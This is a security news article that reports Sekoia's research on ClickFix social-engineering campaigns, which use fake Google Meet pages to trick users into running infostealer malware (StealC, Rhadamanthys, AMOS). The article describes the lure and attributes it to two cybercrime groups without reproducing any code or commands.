Users of the Google Meet video communication service have been targeted by cyber crooks using the ClickFix tactic to infect them with information-stealing malware.
Fake Google Meet video conference page with malicious ClickFix pop-up (Source: Sekoia)
“The ClickFix tactic deceives users into downloading and running malware on their machines without involving a web browser for download or requiring manual file execution,” Sekoia researchers explained.
“It makes it possible to bypass web browser security features, such as Google Safe Browsing, and to appear less suspicious to unsuspecting corporate and individual users.”
The ClickFix tactic
The ClickFix tactic is getting popular with many other threat actors, and presents a grave danger for both consumers and enterprises. Users usually land on the compromised websites by following links from phishing emails or from search engines and if they are unfamiliar with this particular trick, they are likely to get infected.
This social engineering tactic has been named by Proofpoint researchers, who flagged it being used via compromised websites showing fake browser alerts.
The alerts usually warn users that the webpage or document cannot be displayed correctly by the browser until they click the “Fix It” button and follow the outlined steps, which result in the user unknowingly copying and executing malicious code that installs malware.
Since February 2024, Sekoia and other cybersecurity companies have flagged a number of malware delivery campaigns using the same social engineering tactic. Sometimes the call to action is “Fix the problem”, other times is “Prove that you’re human” (on fake CAPTCHA pages).
The fake alerts and requests for verification have been “parked” on compromised sites and Facebook pages, customized to target Google Meet users, GitHub users, companies in the transportation and logistics sector, users looking for video streaming services via Google, and others.
Lures may differ
Sekoia analysts managed to associate the ClickFix cluster impersonating Google Meet with two cybercrime groups that are sub-teams of the cryptocurrency scam teams “Marko Polo” and “CryptoLove”, which are part of the Russian-speaking cybercrime ecosystem.
The script the users unknowingly run delivers the StealC and Rhadamanthys malware to Windows users, and the AMOS stealer to those using macOS. When users get saddled with the malware, a message is sent to Telegram bots so that the crooks may track compromises.
Sekoia researchers say that both groups use the same ClickFix template that impersonates Google Meet, which points to them sharing materials and infrastructure (which is likely managed by a third party).
An analysis of the malware distribution infrastructure shows that the attackers could also be targetting users looking for games, PDF readers, Web3 web browsers and messaging apps, as well as users of the Zoom videoconferencing app.